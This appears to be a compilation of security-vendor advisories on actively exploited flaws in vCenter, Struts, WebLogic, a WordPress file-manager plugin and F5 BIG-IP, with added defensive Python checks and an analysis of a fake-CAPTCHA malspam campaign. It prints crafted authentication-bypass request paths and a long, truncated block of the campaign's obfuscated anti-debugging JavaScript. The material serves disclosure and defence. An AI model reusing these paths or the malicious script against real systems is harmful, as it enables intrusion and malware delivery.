
Critical remote code execution flaw in VMware is being actively exploited

A critical remote code execution vulnerability has been reported in VMware's vSphere/vCenter. The vulnerability is due to improper validation of paths in an uploaded tarball. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successful exploitation can result in code execution in the context of the target process.

CVE-2021-21972:

vCenter Server is the centralized management utility for VMware and is used to manage virtual machines. The vulnerability is reported in the vRealize Operations (vROps) plugin that ships with the default installation of vCenter. This plugin accepts file uploads without authorization and fails to validate the paths contained in the uploaded tarball. An unauthenticated, remote attacker could exploit this vulnerability by uploading a specially crafted file to a vulnerable vCenter Server endpoint that is publicly accessible over port 443. Successful exploitation would give an attacker unrestricted remote code execution on the underlying operating system that hosts vCenter Server.
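The bug class here is an archive extractor that trusts the member paths it is handed. As an added Python example (not VMware's or the plugin's code), the function below checks every tarball entry against the extraction root before anything is written, rejecting traversal, absolute paths and link entries; the scratch directory and the archive entries are constructed samples.

```python
import io
import os
import tarfile


def resolves_inside(dest: str, member_name: str) -> bool:
    """True if dest/member_name, after resolving '..' and symlinks, stays under dest."""
    if os.path.isabs(member_name):
        return False  # an absolute member name ignores dest entirely
    base = os.path.realpath(dest)
    target = os.path.realpath(os.path.join(base, member_name))
    return os.path.commonpath([base, target]) == base


def unsafe_members(tar: tarfile.TarFile, dest: str) -> list[str]:
    """Names of entries that must not be written: escapes via '..' or absolute paths,
    plus symlinks/hardlinks, which could redirect later writes outside dest."""
    flagged = []
    for member in tar.getmembers():
        if not resolves_inside(dest, member.name):
            flagged.append(member.name)
        elif member.issym() or member.islnk():
            flagged.append(member.name)
    return flagged


def safe_extract(tar: tarfile.TarFile, dest: str) -> None:
    """Reject the whole archive if any entry is unsafe; never extract partially."""
    flagged = unsafe_members(tar, dest)
    if flagged:
        raise ValueError(f"refusing to extract archive with unsafe entries: {flagged}")
    tar.extractall(dest)  # Python 3.12+ also offers tar.extractall(dest, filter="data")


def build_sample_tarball(entries: list[str]) -> bytes:
    """Constructed in-memory tarball holding one-byte regular files under the given names."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        for name in entries:
            info = tarfile.TarInfo(name=name)
            payload = b"x"
            info.size = len(payload)
            tar.addfile(info, io.BytesIO(payload))
    return buf.getvalue()


def audit_tarball(blob: bytes, dest: str) -> list[str]:
    """Open an uploaded archive read-only and report the entries that would escape dest."""
    with tarfile.open(fileobj=io.BytesIO(blob), mode="r") as tar:
        return unsafe_members(tar, dest)


# Constructed sample: the scratch directory need not exist; only path resolution is exercised.
SAMPLE_DEST = "/srv/upload-scratch"
SAMPLE_ENTRIES = [
    "plugin/config.xml",          # benign, stays under dest
    "../../etc/escaped.txt",      # traversal: lands two levels above dest
    "plugin/../../escaped2.sh",   # traversal hidden behind a benign-looking prefix
    "/tmp/absolute.txt",          # absolute path ignores dest entirely
]

if __name__ == "__main__":
    print(audit_tarball(build_sample_tarball(SAMPLE_ENTRIES), SAMPLE_DEST))
```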

In most cases, vCenter is reachable only from internal networks. According to Shodan, however, more than 6000 vCenter servers are exposed online and vulnerable to attack.

Bad Packets observed mass scanning activity for CVE-2021-21972, searching for vulnerable vCenter servers.

According to the SANS Internet Storm Center, attack activity on port 443 has increased significantly over the last few days; attackers are likely scanning for vulnerable vCenter servers.

Fix:

The affected vCenter Server plugin for vROps is present in all default installations.

Impacted product versions:

  • 7.0 prior to 7.0 U1c
  • 6.7 prior to 6.7 U3l
  • 6.5 prior to 6.5 U3n

Upgrade to one of the patched versions: 7.0 U1c, 6.7 U3l or 6.5 U3n. If upgrading is not feasible, follow the workarounds in VMware KB82374 to disable the vulnerable plugin.

Find the VMware security advisory here.

SonicWall Capture Labs Threat Research team provides protection against this vulnerability with the following signatures.

IPS: 15403 VMware vCenter Server VMSA-2021-0002 Remote Code Execution (Linux)
IPS: 15404 VMware vCenter Server VMSA-2021-0002 Remote Code Execution (Windows)
IPS: 15406 VMware vCenter Server vropspluginui Access
IPS: 15408 VMware vCenter Server VMSA-2021-0002 Remote Code Execution 3
IPS: 15409 VMware vCenter Server VMSA-2021-0002 Remote Code Execution 4
IPS: 15410 VMware vCenter Server VMSA-2021-0002 Remote Code Execution 5
IPS: 15411 VMware vCenter Server VMSA-2021-0002 Remote Code Execution 6
IPS: 15412 VMware vCenter Server VMSA-2021-0002 Remote Code Execution 7


CVE-2020-17530: Apache Struts vulnerability exploited in the wild

SonicWall Capture Labs Threat Research team has observed hackers actively targeting the recent remote code execution vulnerability in the Apache Struts framework.

This vulnerability is due to insufficient input validation, leading to a forced double OGNL evaluation when evaluating raw user input. A remote attacker could exploit this vulnerability by sending a crafted request to the target server. Successful exploitation will allow an attacker to execute arbitrary code with the privileges of the server.

Apache Struts:

Apache Struts is a modern Java framework that uses the Model-View-Controller (MVC) architecture for building enterprise-ready web applications.

Model - The central component, which manages the data, logic, and rules of the application.

View - Presents information to the user, sometimes allowing multiple views of the same information.

Controller - Accepts input and converts it to commands for the model or view.

Object-Graph Navigation Language (OGNL) is an open-source expression language for Java which, while using simpler expressions than the full range supported by the Java language, allows getting and setting properties as well as executing methods of Java classes.

OGNL uses Java reflection and inspection to address the Object Graph of the runtime application. This allows the program to change behavior based on the state of the object graph instead of relying on compile-time settings. It also allows changes to the object graph.

Due to its ability to create or change executable code, OGNL is capable of introducing critical security flaws to any framework that uses it.

Vulnerability | CVE-2020-17530:

The OGNL context map is initialized with mitigating controls that enforce validation for access to packages, classes, and their normally private or protected methods and fields. These controls are defined by an instance of the SecurityMemberAccess class. By leveraging introspection via the BeanMap instance, private properties of the SecurityMemberAccess instance can be accessed and modified. Most importantly, excludedClasses and excludedPackageNames, which hold the sets of excluded classes and package names respectively, can be cleared, effectively disabling every class and package access restriction.

An attacker is therefore able to completely disable all OGNL expression mitigation controls related to package and class access. Arbitrary code execution can then be achieved by invoking suitable methods from previously disallowed classes, for example the Execute.exec() method from the freemarker.template.utility package.

Exploit:

SonicWall observed the exploit request below, in which the BeanMap instance is leveraged to access and modify the member access controls and set excludedClasses and excludedPackageNames to empty. One of the disallowed classes, "Execute" from the "freemarker.template.utility" package, which gives FreeMarker the ability to execute external commands, is then called to download and execute a malicious file.

Successful exploitation results in the execution of the malicious payload "ssa" with the privileges of the server.

Trend Chart:

IPS hits for the signature "14514" in the last 40 days.

SonicWall Capture Labs Threat Research team protects against this exploit with the following signature:

IPS: 14514 Apache Struts OGNL Wildcard Remote Code Execution 8

Problem:

Some of the tag attributes could perform a double evaluation if a developer applied forced OGNL evaluation by using the %{...} syntax. Using forced OGNL evaluation on untrusted user input can lead to remote code execution and security degradation.

Affected Products:

Apache Software Foundation Struts 2.0.0 through 2.5.25

Fix:

Avoid using forced OGNL evaluation on untrusted user input, and/or upgrade to Struts 2.5.26, which checks to ensure that expression evaluation won’t lead to the double evaluation.
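The double evaluation described above is easiest to see on a miniature template engine. This is an added Python illustration, not Struts or OGNL code: a toy `%{name}` expression syntax is resolved against a rendering context, once in the vulnerable forced-evaluation form that re-evaluates its own result, and once in the single-pass form the fix calls for; the context values are constructed samples, and the guarded variant only mimics the idea of the Struts 2.5.26 check, not its implementation.

```python
import re

# Toy expression syntax standing in for OGNL: %{name} or ${name} is replaced by the value
# bound to `name` in the rendering context. Added illustration only; this is not Struts or OGNL.
EXPRESSION = re.compile(r"[%$]\{\s*([A-Za-z_][A-Za-z0-9_.]*)\s*\}")


def evaluate(text: str, context: dict) -> str:
    """One evaluation pass: every expression becomes the value it names (missing -> '')."""
    return EXPRESSION.sub(lambda match: str(context.get(match.group(1), "")), text)


def render_attribute_forced(attribute: str, context: dict) -> str:
    """Vulnerable pattern. The developer wrote the attribute as %{...}, so it is evaluated,
    and the framework then evaluates the *result* again. If that result came from user input
    and itself looks like an expression, the user's input is executed on the second pass."""
    first_pass = evaluate(attribute, context)
    return evaluate(first_pass, context)


def render_attribute_once(attribute: str, context: dict) -> str:
    """Fixed pattern: evaluate the developer's expression exactly once; whatever it yields
    is treated as data, even if it contains %{...}."""
    return evaluate(attribute, context)


def render_attribute_guarded(attribute: str, context: dict) -> str:
    """Mitigation in the spirit of the 2.5.26 check (illustrative, not the real code):
    refuse to render when the first pass produced an expression that was not in the
    developer's template, which is exactly the condition double evaluation needs."""
    first_pass = evaluate(attribute, context)
    if EXPRESSION.search(first_pass):
        raise ValueError("first pass produced an expression; refusing double evaluation")
    return first_pass


# Constructed rendering context: `requestParam` is raw, untrusted user input; `adminSecret`
# stands for something reachable through the object graph that the user must not obtain.
SAMPLE_CONTEXT = {
    "requestParam": "%{adminSecret}",
    "adminSecret": "CONSTRUCTED-SECRET-VALUE",
}
SAMPLE_ATTRIBUTE = "%{requestParam}"  # a tag attribute written with forced evaluation

if __name__ == "__main__":
    print("forced :", render_attribute_forced(SAMPLE_ATTRIBUTE, SAMPLE_CONTEXT))
    print("once   :", render_attribute_once(SAMPLE_ATTRIBUTE, SAMPLE_CONTEXT))
```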

IOC (attacker IPs):



CVE-2020-14882 Oracle WebLogic Remote Code Execution Vulnerability Exploited in the Wild

SonicWall Capture Labs Threat Research team has observed the recent remote code execution vulnerability reported in Oracle WebLogic Server being exploited in the wild. This vulnerability is due to improper sanitization of user-supplied data received via HTTP.

Oracle WebLogic is one of the most widely used Java application servers. It helps build and deploy distributed web applications for large enterprises.

Vulnerability | CVE-2020-14882

A remote code execution vulnerability exists in Oracle WebLogic Server. The vulnerability is due to improper validation of user-supplied data in the com.bea.console.utils.MBeanUtilsInitSingleFileServlet and com.bea.console.handles.HandleFactory classes.

The vulnerable class com.bea.console.handles.HandleFactory can be triggered using an HTTP request with the following structure:

http://<target>/console/console.portal?_nfpb=true&_pageLabel=HomePage1&handle=<class_name>

MBeanUtilsInitSingleFileServlet does not implement a proper mechanism to filter out the directory traversal sequence "..", nor does it check whether the user is authenticated. As a consequence, an attacker can access "/console/css/%252E%252E%252Fconsole.portal", where "%252E%252E" is the double URL-encoded form of "..", to bypass authentication and supply a request parameter named "handle" whose value is the name of a class that may be used maliciously and will be instantiated by the com.bea.console.handles.HandleFactory class.

This exploit allows an unauthenticated attacker to achieve remote code execution on a vulnerable Oracle WebLogic Server by sending a crafted HTTP GET request. Successful exploitation results in the execution of arbitrary code under the security context of the user running WebLogic Server.

Exploit Requests

The following exploits are currently being used:

http://x.x.x.x:7001

Trend Chart:

SonicWall Capture Labs Threat Research team provides protection against this exploit with the following signatures:

IPS: 14003 Oracle WebLogic Server Remote Command Execution 3
IPS: 15218 Oracle WebLogic Server Remote Command Execution 2

CVE-2020-25213: WordPress plugin wp-file-manager actively being exploited in the wild

WordPress is a free and open-source content management system written in PHP. It is used by more than 60 million websites, and 38% of the web is built on WordPress. Its plugin architecture allows users to extend its features and functionality to tailor websites to their specific needs.

Vulnerability | CVE-2020-25213:

An improper access control vulnerability has been reported in the File Manager plugin for WordPress. The vulnerability is due to improper access control of connector.minimal.php file while uploading files. An unauthenticated remote attacker can exploit this vulnerability by uploading a file on the target system. A successful attack could result in code execution in the security context of the target WordPress server.

The vulnerable program is connector.minimal.php in wp-content/plugins/wp-file-manager/lib/php/. The vulnerability stems from the fact that connector.minimal.php can be accessed by an unauthenticated attacker. connector.minimal.php loads elFinderConnector.class.php, which reads HTTP request parameters and drives File Manager features such as file upload. connector.minimal.php does not implement any authorization mechanism, such as checking the privileges of the user making the request. As a result, an unauthenticated attacker can upload arbitrary files to the server, such as a malicious PHP file, potentially leading to the execution of arbitrary code.

Exploit:

In the above exploit request, the PHP file "test_php_info.php" can be replaced with any arbitrary file to be uploaded to the server. Besides the "upload" command, the "mkfile" and "put" commands available in elFinder could be used to write a PHP file into the directory and later achieve arbitrary remote code execution.

Trend Chart:

Patch:

The products below are affected by this vulnerability.

  • File Manager Pro File Manager Plugin for WordPress 6.0 to 6.8
  • File Manager Pro File Manager Pro Plugin for WordPress 7.6 to 7.8

The File Manager plugin patched the issue by removing the "lib/php/connector.minimal.php" file from the plugin. Manually removing this file should also prevent attackers from exploiting this vulnerability.

Refer to the vendor advisory here.

SonicWall Capture Labs Threat Research team provides protection against this exploit with the following signatures:

IPS: 15205 WordPress wp-file-manager Plugin Remote Code Execution

Indicators of compromise:


CVE-2020-5902: Hackers actively exploit critical vulnerability in F5 BIG-IP

BIG-IP

F5's BIG-IP is a product family comprising software, hardware, and virtual appliances designed around application availability, access control, and security. BIG-IP software products run on top of F5's Traffic Management Operating System® (TMOS), designed specifically to inspect network and application traffic and make real-time decisions based on the given configuration. The BIG-IP Configuration Utility is a web GUI for F5 users to set up the BIG-IP product and make additional changes.

Vulnerability | CVE-2020-5902

BIG-IP Web GUI is accessible over HTTPS on port 443/TCP via the following URL: https://<BIG-IP server>/tmui/login.jsp

A directory traversal vulnerability exists in the F5 BIG-IP product family, due to insufficient validation of the URI in HTTP requests. By using a semicolon in the URI, a remote attacker can bypass the access control policy set up on Apache and have the malicious URI forwarded to the Tomcat back-end server. When Tomcat normalizes the URI, anything following a semicolon within a path segment is ignored. The root cause of the vulnerability is that Apache and Tomcat parse the URL differently, allowing users to bypass authentication and invoke JSP modules. Successful exploitation allows unauthenticated remote attackers to access the internal Java binaries on the vulnerable server.

The following internal JSP files are widely used to compromise servers:

/tmui/tmui/locallb/workspace/tmshCmd.jsp
/tmui/tmui/locallb/workspace/fileRead.jsp
/tmui/tmui/locallb/workspace/fileWrite.jsp
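The WebLogic bug above (a double-encoded ".." that a single-decode filter never sees) and this BIG-IP bug (a ";" that Apache treats as a literal character and Tomcat strips) share a root cause: the component enforcing access sees a different path from the component serving it. As an added Python example (not SonicWall's, Oracle's or F5's code), the triage below decodes request paths until they stop changing and normalizes them both ways, flagging any disagreement; the request lines are constructed samples that reuse the paths quoted in the text, and the handle value is a placeholder.

```python
import posixpath
from urllib.parse import parse_qs, unquote, urlsplit


def percent_decode_rounds(text: str, max_rounds: int = 3) -> tuple[str, int]:
    """Percent-decode until the string stops changing. A filter that decodes only once
    never sees what a second round reveals; the round count says how deep it was."""
    rounds = 0
    while rounds < max_rounds:
        decoded = unquote(text)
        if decoded == text:
            break
        text, rounds = decoded, rounds + 1
    return text, rounds


def frontend_view(path: str) -> str:
    """Front-end (Apache-style) normalization: ';' is an ordinary character, so a segment
    such as '..;' is a literal name and does not step up a directory."""
    return posixpath.normpath(path)


def backend_view(path: str) -> str:
    """Back-end (Tomcat-style) normalization: strip ';param' from every segment first,
    so '..;' becomes '..' and the path collapses to a different resource."""
    segments = [segment.split(";", 1)[0] for segment in path.split("/")]
    return posixpath.normpath("/".join(segments))


def triage(request_line: str) -> dict:
    """Return the resource the back end would actually serve plus a list of findings."""
    method, target, _version = request_line.split(" ", 2)
    parts = urlsplit(target)  # urlsplit keeps ';' inside the path, unlike urlparse
    decoded_path, rounds = percent_decode_rounds(parts.path)
    findings = []
    if rounds >= 2:
        findings.append("double-encoded path")
    if ".." in decoded_path.split("/"):
        findings.append("dot-dot traversal after decoding")  # misses '..;' on purpose
    front, back = frontend_view(decoded_path), backend_view(decoded_path)
    if front != back:
        findings.append("front-end/back-end normalization mismatch")
    query = parse_qs(parts.query)
    if back == "/console/console.portal" and "handle" in query:
        findings.append("WebLogic console.portal reached with handle parameter")
    if back.startswith("/tmui/tmui/locallb/workspace/") and back.endswith(".jsp"):
        findings.append("BIG-IP internal TMUI JSP reached")
    return {"method": method, "effective_path": back, "findings": findings}


# Constructed request lines. The WebLogic path and the TMUI JSP name come from the text
# above; HANDLE_CLASS_PLACEHOLDER stands in for the class name the text elides.
SAMPLE_REQUESTS = [
    "GET /console/css/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=HomePage1"
    "&handle=HANDLE_CLASS_PLACEHOLDER HTTP/1.1",
    "GET /tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1",
    "GET /tmui/login.jsp HTTP/1.1",  # ordinary login page request for comparison
]


def triage_samples() -> list[dict]:
    return [triage(line) for line in SAMPLE_REQUESTS]


if __name__ == "__main__":
    for result in triage_samples():
        print(result["effective_path"], result["findings"])
```

Note that the plain ".." check alone does not fire on the BIG-IP sample; only comparing the two normalizations does, which is why a front-end access rule written in path terms is not enough on its own.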

Exploit:

We observed the HTTP exploit requests below targeting F5 BIG-IP servers vulnerable to CVE-2020-5902.

Impact:

A quick search on Shodan reveals more than 6000 BIG-IP servers exposed publicly over the internet. Over 2000 of those servers seem vulnerable to CVE-2020-5902.

Trend Chart:

SonicWall Capture Labs Threat Research team provides protection against this exploit with the following signatures:

IPS: 15070 F5 BIG-IP TMUI Remote Command Execution

Affected Products:

BIG-IP versions 11.6.1 - 11.6.5, 12.1.0 - 12.1.5, 13.1.0 - 13.1.3, 14.1.0 - 14.1.2, 15.1.0 and 15.0.0 - 15.0.1 are affected by this vulnerability.

Find the vendor advisory here.

IOC:

Attacker IPs:



Massive malspam campaign delivers malicious payloads using fake CAPTCHA

SonicWall Capture Labs Threat Research team has come across a new malspam campaign that pretends to deliver a legitimate PDF but installs malware on the victim's computer. When a user opens the PDF, they are shown a prompt that pretends to be a CAPTCHA asking the user to confirm they are human. This is not a real Google reCAPTCHA but a fake image; clicking on it takes the user to a malicious web page.

The malspam targets users who open the PDF in a browser. When the user clicks the CAPTCHA image from Adobe Reader, the user gets a warning (see below) that the PDF is trying to connect to the internet. However, when the user opens the PDF in a browser, clicking the CAPTCHA takes the user to the malicious web page without any prompt or warning.

The malicious web page below runs JavaScript on the client side before redirecting the user to the payload delivery page. The name of the payload, "new+toeic+reading+test", is appended to the URL.

This JavaScript is heavily obfuscated and uses anti-debugging techniques to protect the script from analysis. A "debugger;" instruction inside the code halts execution whenever an attached debugger reaches it. It also implements bot detection ( botFound = 0x1; ) to avoid being detected by good bots such as Google Safe Browsing. The script is obfuscated using the String Array Rotation and RC4 encryption options.


(function(_0x1dce8c, _0x5b051f) {
var _0x2b7434 = function(_0x405980) {
while (--_0x405980) {
_0x1dce8c['push'](_0x1dce8c['shift']());
}
};
var _0x1ec282 = function() {
var _0x5485e0 = {
'data': {
'key': 'cookie',
'value': 'timeout'
},
'setCookie': function(_0x486570, _0x4faa03, _0x2d8cfb, _0x4061c2) {
_0x4061c2 = _0x4061c2 || {};
var _0x484c12 = _0x4faa03 + '=' + _0x2d8cfb;
var _0x1ad806 = 0x0;
for (var _0x3a4b87 = 0x0, _0x30594b = _0x486570['length']; _0x3a4b87 < _0x30594b; _0x3a4b87++) {
var _0x18303a = _0x486570[_0x3a4b87];
_0x484c12 += ';\x20' + _0x18303a;
var _0x87bc3a = _0x486570[_0x18303a];
_0x486570['push'](_0x87bc3a);
_0x30594b = _0x486570['length'];
if (_0x87bc3a !== !![]) {
_0x484c12 += '=' + _0x87bc3a;
}
}
_0x4061c2['cookie'] = _0x484c12;
},
'removeCookie': function() {
return 'dev';
},
'getCookie': function(_0x1c2477, _0x146aeb) {
_0x1c2477 = _0x1c2477 || function(_0x4926d8) {
return _0x4926d8;
}
;
var _0x51e992 = _0x1c2477(new RegExp('(?:^|;\x20)' + _0x146aeb['replace'](/([.$?*|{}()[]\/+^])/g, '$1') + '=([^;]*)'));
var _0x4ea3dc = function(_0x156b04, _0x1c0adb) {
_0x156b04(++_0x1c0adb);
};
_0x4ea3dc(_0x2b7434, _0x5b051f);
return _0x51e992 ? decodeURIComponent(_0x51e992[0x1]) : undefined;
}
};
var _0x1ef41d = function() {
var _0x24b128 = new RegExp('\x5cw+\x20*\x5c(\x5c)\x20*{\x5cw+\x20*[\x27|\x22].+[\x27|\x22];?\x20*}');
return _0x24b128['test'](_0x5485e0['removeCookie']['toString']());
};
_0x5485e0['updateCookie'] = _0x1ef41d;
var _0x13c3ad = '';
var _0x55f2da = _0x5485e0['updateCookie']();
if (!_0x55f2da) {
_0x5485e0['setCookie'](['*'], 'counter', 0x1);
} else if (_0x55f2da) {
_0x13c3ad = _0x5485e0['getCookie'](null, 'counter');
} else {
_0x5485e0['removeCookie']();
}
};
_0x1ec282();
}(_0x5b05, 0xe1));
var _0x2b74 = function(_0x1dce8c, _0x5b051f) {
_0x1dce8c = _0x1dce8c - 0x0;
var _0x2b7434 = _0x5b05[_0x1dce8c];
if (_0x2b74['qKubPo'] === undefined) {
(function() {
var _0x5485e0 = typeof window !== 'undefined' ? window : typeof process === 'object' && typeof require === 'function' && typeof global === 'object' ? global : this;
var _0x1ef41d = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';
_0x5485e0['atob'] || (_0x5485e0['atob'] = function(_0x13c3ad) {
var _0x55f2da = String(_0x13c3ad)['replace'](/=+$/, '');
var _0x486570 = '';
for (var _0x4faa03 = 0x0, _0x2d8cfb, _0x4061c2, _0x484c12 = 0x0; _0x4061c2 = _0x55f2da['charAt'](_0x484c12++); ~_0x4061c2 && (_0x2d8cfb = _0x4faa03 % 0x4 ? _0x2d8cfb * 0x40 + _0x4061c2 : _0x4061c2,
_0x4faa03++ % 0x4) ? _0x486570 += String['fromCharCode'](0xff & _0x2d8cfb >> (-0x2 * _0x4faa03 & 0x6)) : 0x0) {
_0x4061c2 = _0x1ef41d['indexOf'](_0x4061c2);
}
return _0x486570;
}
);
}());
var _0x405980 = function(_0x1ad806, _0x3a4b87) {
var _0x30594b = [], _0x18303a = 0x0, _0x87bc3a, _0x1c2477 = '', _0x146aeb = '';
_0x1ad806 = atob(_0x1ad806);
for (var _0x4ea3dc = 0x0, _0x4926d8 = _0x1ad806['length']; _0x4ea3dc < _0x4926d8; _0x4ea3dc++) {
_0x146aeb += '%' + ('00' + _0x1ad806['charCodeAt'](_0x4ea3dc)['toString'](0x10))['slice'](-0x2);
}
_0x1ad806 = decodeURIComponent(_0x146aeb);
var _0x51e992;
for (_0x51e992 = 0x0; _0x51e992 < 0x100; _0x51e992++) {
_0x30594b[_0x51e992] = _0x51e992;
}
for (_0x51e992 = 0x0; _0x51e992 < 0x100; _0x51e992++) {
_0x18303a = (_0x18303a + _0x30594b[_0x51e992] + _0x3a4b87['charCodeAt'](_0x51e992 % _0x3a4b87['length'])) % 0x100;
_0x87bc3a = _0x30594b[_0x51e992];
_0x30594b[_0x51e992] = _0x30594b[_0x18303a];
_0x30594b[_0x18303a] = _0x87bc3a;
}
_0x51e992 = 0x0;
_0x18303a = 0x0;
for (var _0x156b04 = 0x0; _0x156b04 < _0x1ad806['length']; _0x156b04++) {
_0x51e992 = (_0x51e992 + 0x1) % 0x100;
_0x18303a = (_0x18303a + _0x30594b[_0x51e992]) % 0x100;
_0x87bc3a = _0x30594b[_0x51e992];
_0x30594b[_0x51e992] = _0x30594b[_0x18303a];
_0x30594b[_0x18303a] = _0x87bc3a;
_0x1c2477 += String['fromCharCode'](_0x1ad806['charCodeAt'](_0x156b04) ^ _0x30594b[(_0x30594b[_0x51e992] + _0x30594b[_0x18303a]) % 0x100]);
}
return _0x1c2477;
};
_0x2b74['POefWy'] = _0x405980;
_0x2b74['AUKXmF'] = {};
_0x2b74['qKubPo'] = !![];
}
var _0x1ec282 = _0x2b74['AUKXmF'][_0x1dce8c];
if (_0x1ec282 === undefined) {
if (_0x2b74['BZmetc'] === undefined) {
var _0x1c0adb = function(_0x24b128) {
this['JSKXWl'] = _0x24b128;
this['rHzKjw'] = [0x1, 0x0, 0x0];
this['OyTmfb'] = function() {
return 'newState';
}
;
this['IFbkEo'] = '\x5cw+\x20*\x5c(\x5c)\x20*{\x5cw+\x20*';
this['WigiHa'] = '[\x27|\x22].+[\x27|\x22];?\x20*}';
};
_0x1c0adb['prototype']['iugFxR'] = function() {
var _0x47af1e = new RegExp(this['IFbkEo'] + this['WigiHa']);
var _0xa4109e = _0x47af1e['test'](this['OyTmfb']['toString']()) ? --this['rHzKjw'][0x1] : --this['rHzKjw'][0x0];
return this['QBsVTu'](_0xa4109e);
}
;
_0x1c0adb['prototype']['QBsVTu'] = function(_0x5f53c3) {
if (!Boolean(~_0x5f53c3)) {
return _0x5f53c3;
}
return this['lHFrPa'](this['JSKXWl']);
}
;
_0x1c0adb['prototype']['lHFrPa'] = function(_0x13ad3a) {
for (var _0x3556c9 = 0x0, _0xb5a159 = this['rHzKjw']['length']; _0x3556c9 < _0xb5a159; _0x3556c9++) {
this['rHzKjw']['push'](Math['round'](Math['random']()));
_0xb5a159 = this['rHzKjw']['length'];
}
return _0x13ad3a(this['rHzKjw'][0x0]);
}
;
new _0x1c0adb(_0x2b74)['iugFxR']();
_0x2b74['BZmetc'] = !![];
}
_0x2b7434 = _0x2b74['POefWy'](_0x2b7434, _0x5b051f);
_0x2b74['AUKXmF'][_0x1dce8c] = _0x2b7434;
} else {
_0x2b7434 = _0x1ec282;
}
return _0x2b7434;
};
var _0x4eb278 = function() {
var _0x39e554 = {
'\x5a\x68\x6f\x4f\x4a': function(_0x5a7a3f, _0x55a2c0) {
return _0x5a7a3f !== _0x55a2c0;
},
'\x4a\x76\x67\x55\x4e': _0x2b74('\x30\x78\x31\x31', '\x21\x31\x54\x42'),
'\x6b\x71\x77\x43\x43': _0x2b74('\x30\x78\x61\x38', '\x41\x68\x6c\x62'),
'\x4c\x6f\x70\x5a\x49': function(_0x10738c, _0x42f116) {
return _0x10738c + _0x42f116;
},
'\x6f\x56\x4c\x73\x46': _0x2b74('\x30\x78\x38\x64', '\x28\x39\x4a\x54'),
'\x61\x79\x58\x68\x47': _0x2b74('\x30\x78\x31\x39', '\x71\x36\x59\x5b')
};
var _0x2fd54f = !![];
return function(_0x246b00, _0x10aa18) {
var _0x3d5d42 = {
'\x7a\x69\x47\x68\x6f': function(_0x4e75a7, _0x5de1bc) {
return _0x39e554[_0x2b74('\x30\x78\x33\x63', '\x35\x29\x74\x52')](_0x4e75a7, _0x5de1bc);
}
};
if (_0x39e554[_0x2b74('\x30\x78\x31\x32', '\x58\x73\x52\x4c')](_0x39e554[_0x2b74('\x30\x78\x37\x30', '\x43\x73\x40\x25')], _0x39e554[_0x2b74('\x30\x78\x37\x64', '\x71\x36\x59\x5b')])) {
var _0x4d23fe = _0x2fd54f ? function() {
if (_0x10aa18) {
if (_0x39e554[_0x2b74('\x30\x78\x63\x33', '\x71\x36\x59\x5b')](_0x39e554[_0x2b74('\x30\x78\x62', '\x31\x4b\x37\x6f')], _0x39e554['\x6b\x71\x77\x43\x43'])) {
var _0x554d08 = _0x10aa18[_0x2b74('\x30\x78\x34', '\x31\x4b\x37\x6f')](_0x246b00, arguments);
_0x10aa18 = null;
return _0x554d08;
} else {
botFound = 0x1;
}
}
}
: function() {}
;
_0x2fd54f = ![];
return _0x4d23fe;
} else {
key = window[_0x2b74('\x30\x78\x32\x38', '\x76\x4c\x37\x59')][_0x2b74('\x30\x78\x35\x37', '\x24\x29\x53\x73')]['\x73\x75\x62\x73\x74\x72\x69\x6e\x67'](_0x3d5d42['\x7a\x69\x47\x68\x6f'](window[_0x2b74('\x30\x78\x39\x32', '\x6e\x75\x61\x7a')][_0x2b74('\x30\x78\x61\x35', '\x21\x31\x54\x42')]['\x6c\x61\x73\x74\x49\x6e\x64\x65\x78\x4f\x66']('\x23'), 0x1));
}
}
;
}();
var _0x3b6a81 = _0x4eb278(this, function() {
var _0x4e207c = {
'\x76\x72\x6f\x62\x69': function(_0x3b9202, _0x19d11b) {
return _0x3b9202 === _0x19d11b;
},
'\x71\x6a\x6e\x43\x4f': _0x2b74('\x30\x78\x63\x31', '\x52\x77\x38\x4c'),
'\x42\x4b\x43\x61\x4a': _0x2b74('\x30\x78\x63\x65', '\x42\x46\x4f\x38'),
'\x66\x4a\x77\x5a\x4e': '\x72\x65\x74\x75\x72\x6e\x20\x2f\x22\x20\x2b\x20\x74\x68\x69\x73\x20\x2b\x20\x22\x2f',
'\x71\x6c\x74\x75\x61': '\x5e\x28\x5b\x5e\x20\x5d\x2b\x28\x20\x2b\x5b\x5e\x20\x5d\x2b\x29\x2b\x29\x2b\x5b\x5e\x20\x5d\x7d'
};
var _0x28e018 = function() {
if (_0x4e207c['\x76\x72\x6f\x62\x69'](_0x4e207c[_0x2b74('\x30\x78\x64\x37', '\x54\x58\x57\x4d')], _0x4e207c[_0x2b74('\x30\x78\x39\x65', '\x76\x4c\x37\x59')])) {
if (fn) {
var _0x5ec24a = fn[_0x2b74('\x30\x78\x31\x36', '\x57\x2a\x58\x26')](context, arguments);
fn = null;
return _0x5ec24a;
}
} else {
var _0x4840c0 = _0x28e018[_0x2b74('\x30\x78\x62\x32', '\x52\x74\x36\x77')](_0x4e207c[_0x2b74('\x30\x78\x33\x31', '\x28\x39\x4a\x54')])()[_0x2b74('\x30\x78\x31\x64', '\x44\x54\x49\x4a')](_0x4e207c[_0x2b74('\x30\x78\x62\x33', '\x21\x63\x46\x41')]);
return !_0x4840c0['\x74\x65\x73\x74'](_0x3b6a81);
}
};
return _0x28e018();
});
_0x3b6a81();
var _0x102c43 = function() {
var _0x1ac60b = {
'\x65\x71\x48\x50\x59': function(_0x2de5e1, _0x812d62) {
return _0x2de5e1 !== _0x812d62;
}
};
var _0x45913c = !![];
return function(_0x4fcd89, _0x342818) {
var _0x31ff75 = {
'\x48\x61\x42\x76\x67': function(_0x5d7f4b, _0x2fd5d9) {
return _0x1ac60b[_0x2b74('\x30\x78\x63\x62', '\x38\x38\x32\x4f')](_0x5d7f4b, _0x2fd5d9);
},
'\x6a\x54\x48\x51\x61': _0x2b74('\x30\x78\x62\x63', '\x38\x38\x32\x4f')
};
var _0x3af8fb = _0x45913c ? function() {
if (_0x31ff75['\x48\x61\x42\x76\x67'](_0x2b74('\x30\x78\x32\x33', '\x58\x73\x52\x4c'), _0x31ff75[_0x2b74('\x30\x78\x31\x65', '\x54\x58\x57\x4d')])) {
var _0x42c594 = _0x342818[_0x2b74('\x30\x78\x33\x30', '\x2a\x21\x25\x5d')](_0x4fcd89, arguments);
_0x342818 = null;
